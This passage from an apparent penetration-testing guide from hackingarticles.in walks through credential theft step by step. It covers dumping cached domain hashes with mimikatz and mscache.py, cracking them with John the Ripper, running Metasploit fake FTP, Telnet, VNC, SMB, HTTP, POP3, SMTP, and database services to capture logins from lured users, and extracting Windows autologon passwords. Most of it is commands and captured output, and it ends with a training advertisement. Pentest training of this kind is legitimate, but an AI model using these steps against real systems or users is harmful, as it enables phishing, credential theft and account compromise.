about koadic from here. Run following module to hashes:

use mimikatz_dotnet2js
set MIMICMD lsadump::cache
And again, you will get the MSCACHEv2 hashes on your screen.

www.hackingarticles.in Page | 149

Just like impacket, you can download the MSCACHEV2 python script to extract the stored hashes.
Download the script from GitHub and then use security and system files (As discussed in Impacted)

python mscache.py --security /root/Desktop/security

–system /root/Desktop/system

And again, you will get the MSCACHEv2 hashes on your screen.

www.hackingarticles.in Page | 150

As we know these hashes are not used to PASS the Hash attack, thus we need to use john the ripper
to crack these hashes for utilising it.

john --format=mscasch2 --
wordlist=/usr/share/wordlists/rockyou.txt mhash

As a result, it has dumped the password in clear text for the given hash file. Hence don’t get confused
between DCC2 or MSCACHEV2/MSCASH hash these all are the same and you can use the above-
discussed method to extract them.

www.hackingarticles.in Page | 151

In Metasploit by making use of auxiliary modules, you can fake any server of choice and gain
credentials of the victim. For your server to be used, you can make use of the search command to
look for modules. So, to get you started, switch on your Kali Linux machines and start Metasploit using
the command

msfconsole

FTP stands for ‘file transferring Protocol’ used for the transfer of computer files between a client and
server on a computer network at port 21. This module provides a fake FTP service that is designed to
capture authentication credentials.
To achieve this, you can type

msf5 > use auxiliary/server/capture/ftp

msf5 auxiliary(server/capture/ftp) > set srvhost
192.168.0.102
msf5 auxiliary(server/capture/ftp) > set banner Welcome
to Hacking Articles
msf5 auxiliary(server/capture/ftp) > exploit

Here you see that the server has started and the module is running.

www.hackingarticles.in Page | 153

On doing a Nmap scan with the FTP port and IP address, you can see that the port is open.

nmap -p21 <ip address>

ftp 192.168.0.102
Now to lure the user into believing, it to be a genuine login page you can trick the user into opening
the FTP login page. It will display, ‘Welcome to Hacking Articles’ and it will ask the user to put his user
Id and password.
According to the user, it would be a genuine page, he will put his user ID and password.

It will show the user that the login is failed, but the user ID and password will be captured by the
listener.
You see that the ID /Password is

raj/123

www.hackingarticles.in Page | 154

Telnet is a networking protocol that allows a user on one computer to log into another computer that
is part of the same network at port 23. This module provides a fake Telnet service that is designed to
capture authentication credentials.
To achieve this, you can type

msf5 > use auxiliary/server/capture/telnet

msf5 auxiliary(server/capture/ telnet) > set banner
Welcome to Hacking Articles
msf5 auxiliary(server/capture/ telnet) > set srvhost
192.168.0.102
msf5 auxiliary(server/capture/ telnet) > exploit

On doing a Nmap scan with the Telnet port and IP address, you can see that the port is open.

nmap -p23<ip address>

telnet 192.168.0.102

Now to lure the user into believing, it to be a genuine login page you can trick the user into opening
the Telnet login page. It will display, ‘Welcome to Hacking Articles’ and it will ask the user to put his
user Id and password.
According to the user, it would be a genuine page, he will put his user ID and password.

www.hackingarticles.in Page | 155

It will show the user that the login is failed, but the user ID and password will be captured by the
listener.
You see that the ID /Password is

ignite/123

VNC Virtual Network Computing is a graphical desktop sharing system that uses the Remote Frame
Buffer protocol to remotely control another computer at port 5900. This module provides a fake VNC
service that is designed to capture authentication credentials.
To achieve this, you can type

msf5 > use auxiliary/server/capture/vnc

msf5 auxiliary(server/capture/ vnc) > set srvhost
192.168.0.102
msf5 auxiliary(server/capture/ vnc) > set johnpwfile
/root/Desktop/
msf5 auxiliary(server/capture/ vnc) > exploit

Here we use JOHNPWFILE option to save the captures hashes in John the Ripper format. Here we see
that the module is running and the listener has started.

www.hackingarticles.in Page | 156

On doing a Nmap scan with the vnc port and IP address, you can see that the port is open.

nmap -p5900 <ip address>

vncviewer 192.168.0.102
According to the user, it would be a genuine page, as on starting vncviewer he will put his user ID and
password.

It will show that there was an authentication failure, but the hash for the password has been captured.

SMB stands for server message block which is used to share printers, files etc at port 445. This module
provides an SMB service that can be used to capture the challenge-response password hashes of the
SMB client system.
To achieve this, you can type

www.hackingarticles.in Page | 157

 msf5 > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/ smb) > set johnpwfile
/root/ Desktop/
msf5 auxiliary(server/capture/ smb) > set srvhost
192.168.0.102
msf5 auxiliary(server/capture/ smb) > exploit

The server capture credentials in a hash value which can be cracked later, therefore johnpwfile of
John the Ripper

On doing a Nmap scan with the smb port and IP address, you can see that the port is open

nmap -p445 <ip address>

As a result, this module will now generate a spoofed window security prompt on the victim’s system
to establish a connection with another system to access shared folders of that system.

www.hackingarticles.in Page | 158

It will show the user that the login failure, but the credentials will be captured by the listener. Here
you can see that the listener has captured the user and the domain name. It has also generated an NT
hash which can be decrypted with John the ripper.

Here you can see that the hash file generated on the desktop can be decrypted using

john _netntlmv2
And here you see that the password is in text form, 123 for user Raj.

www.hackingarticles.in Page | 159

 This module responds to all requests for resources with an HTTP 401. This should cause most browsers
to prompt for a credential. If the user enters Basic Auth creds they are sent to the console. This may
be helpful in some phishing expeditions where it is possible to embed a resource into a page
To exploit HTTP (80), you can type

msf5 > use auxiliary/server/capture/ http_basic

msf5 auxiliary(server/capture/ http_basic) > set
RedirectURL www.hackingarticles.in
msf5 auxiliary(server/capture/ http_basic) > set srvhost
192.168.0.102
msf5 auxiliary(server/capture/ http_basic) > set uripath
sales
msf5 auxiliary(server/capture/ http_basic) > exploit

As a result, this module will now generate a spoofed login prompt on the victim’s system when an
HTTP URL is opened.

www.hackingarticles.in Page | 160

It will show the user that the login is failed, but the user ID and password will be captured by the
listener.
You see that the ID /Password is Raj/123

www.hackingarticles.in Page | 161

POP3 is a client/server protocol in which e-mail is received and held for you by your Internet server at
port 110. This module provides a fake POP3 service that is designed to capture authentication
credentials.
To achieve this, you can type

msf5 > use auxiliary/server/capture/pop3

msf5 auxiliary(server/capture/pop3) > set srvhost
192.168.0.102
msf5 auxiliary(server/capture/pop3) > exploit

On doing a Nmap scan with the POP3 port and IP address, you can see that the port is open

nmap -p110 <ip address>

telnet 192.168.0.102 110
According to the user, it would be a genuine page, he will put his user ID and password.

You see that the User /Password captured by the listener is raj/123

www.hackingarticles.in Page | 162

SMTP stands for Simple Mail Transfer Protocol which is a communication protocol for electronic mail
transmission at port 25. This module provides a fake SMTP service that is designed to capture
authentication credentials
To achieve this, you can type

msf5 > use auxiliary/server/capture/smtp

msf5 auxiliary(server/capture/smtp) > set
srvhost 192.168.0.102
msf5 auxiliary(server/capture/smtp) > exploit

On doing a Nmap scan with the SMTP port and IP address, you can see that the port is open

nmap -p25 <ip address>

telnet 192.168.0.102 25

According to the user, it would be a genuine page, he will put his user ID and password.

On adding the ID and password, it will show server error to the user, but it will be captured by the
listener raj:123

www.hackingarticles.in Page | 163

Postgresql is an opensource database that is widely available at port 5432. This module provides a
fake PostgreSQL service that is designed to capture clear-text authentication credentials.

msf5 > use auxiliary/server/capture/postgresql

msf5 auxiliary (server/capture/ postgresql) > set
srvhost 192.168.0.102
msf5 auxiliary (server/capture/ postgresql) >
exploit

On doing a Nmap scan with the PostgreSQL port and IP address, you can see that the port is open

nmap -p5432 <ip address>

psql -h 192.168.0.102 -U raj
According to the user, it would be a genuine page, he will put his user ID and password

On adding the ID and password, it will show a server error to the user, but it will be captured by the
listener raj/123.

www.hackingarticles.in Page | 164

Mssql is a Microsoft developed database management system that is widely available at 1433. This
module provides a fake MSSQL service that is designed to capture authentication credentials. This
module support both the weakly encoded database logins as well as Windows logins (NTLM).
To achieve this,

msf5 > use auxiliary/server/capture/mssql

msf5 auxiliary (server/capture/ mssql) > set srvhost
192.168.0.102
msf5 auxiliary (server/capture/ mssql) > exploit

It will open a fake Microsoft session manager window. According to the user, it would be a genuine
page, he will put his user ID and password.

On adding the ID and password, it will show a server error to the user, but it will be captured by the
listener

www.hackingarticles.in Page | 165

The http_ntlm capture module tries to quietly catch the NTLM challenge hashes over HTTP.

msf5 > use auxiliary/server/capture/ http_ntlm

msf5 auxiliary(server/capture/ http_ntlm) > set
johnpwfile /root/Desktop
msf5 auxiliary(server/capture/ http_ntlm) > set
srvhost 192.168.0.102
msf5 auxiliary(server/capture/ http_ntlm) > set
uripath report
msf5 auxiliary(server/capture/ http_ntlm) > exploit

As a result, this module will now generate a spoofed login prompt on the victim’s system when an
HTTP URL is opened.

It will show the user that the logon failure, but the credentials will be captured by the listener. Here
you can see that the listener has captured the user and the domain name. It has also generated an NT
hash which can be decrypted with John the ripper

www.hackingarticles.in Page | 166

And here you see that the hash file generated can be decrypted using john_netnlmv2.
And here you see that the password is in text form, 123 for user Raj.

It is an opensource database management system at port 3306. This module provides a fake MySQL
service that is designed to capture authentication credentials. It captures challenge and response pairs
that can be supplied at Johntheripper for cracking.
To achieve this,

msf5 > use auxiliary/server/capture/mysql

msf5 auxiliary (server/capture/ mysql) > set
srvhost 192.168.0.102
msf5 auxiliary (server/capture/ mysql) >
exploit

On doing a Nmap scan with the MySql port and IP address, you can see that the port is open

www.hackingarticles.in Page | 167

 nmap -p3306 <ip address>
mysql -h 192.168.0.102 -u root -p
According to the user, it would be a genuine page, he will put his user ID and password.

You see that the User /Password captured by the listener is 1234

www.hackingarticles.in Page | 168

Autologon helps you to conveniently customize the built-in Autologon mechanism for Windows.
Rather than waiting for a user to enter their name and password, Windows will automatically log in to
the required user using the credentials you submit with Autologon, which are encrypted in the
registry.
In this post, we will try to dump the stored autologin credentials with the help of two different tools.
Let’s see the settings for autologin, first, you need to access the User Accounts Control Panel
using netplwiz command inside the run prompt.

Choose the account for autologon, for example, we have selected user Raj.

Enter your password once and then a second time to confirm it and uncheck the box “Users must
enter a user name and password to use this computer” then click OK.

www.hackingarticles.in Page | 170

Network Password Recovery is very easy to use, install and run the tool on the local machine whose
password you chose to extract. It will dump the stored credential for the autologon account.
You can download this tool from here

www.hackingarticles.in Page | 171

This tool can extract/decrypt the password that was stored in the LSA by SysInternals AutoLogo.
You can download its Compiled Version HERE
Run the downloaded .exe as shown in the given image, it will dump the password in the Plain text.

 https://www.hackingarticles.in/credential-dumping-wireless/
 https://www.hackingarticles.in/credential-dumping-group-policy-
preferences-gpp/
 https://www.hackingarticles.in/credential-dumping-windows-
credential-manager/
 https://www.hackingarticles.in/credential-dumping-wdigest/
 https://www.hackingarticles.in/credential-dumping-security-
support-provider-ssp/
 https://www.hackingarticles.in/credential-dumping-sam/
 https://www.hackingarticles.in/credential-dumping-applications/
 https://www.hackingarticles.in/credential-dumping-ntds-dit/
 https://www.hackingarticles.in/credential-dumping-phishing-
windows-credentials/
 https://www.hackingarticles.in/credential-dumping-local-security-
authority-lsalsass-exe/
 https://www.hackingarticles.in/credential-dumping-clipboard/
 https://www.hackingarticles.in/credential-dumping-dcsync-attack/
 https://www.hackingarticles.in/credential-dumpinglaps/
 https://www.hackingarticles.in/credential-dumping-domain-cache-
credential/
 https://www.hackingarticles.in/credential-dumping-fake-services/
 https://www.hackingarticles.in/credential-dumping-windows-
autologon-password/

www.hackingarticles.in Page | 172

 JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security

Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer

Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in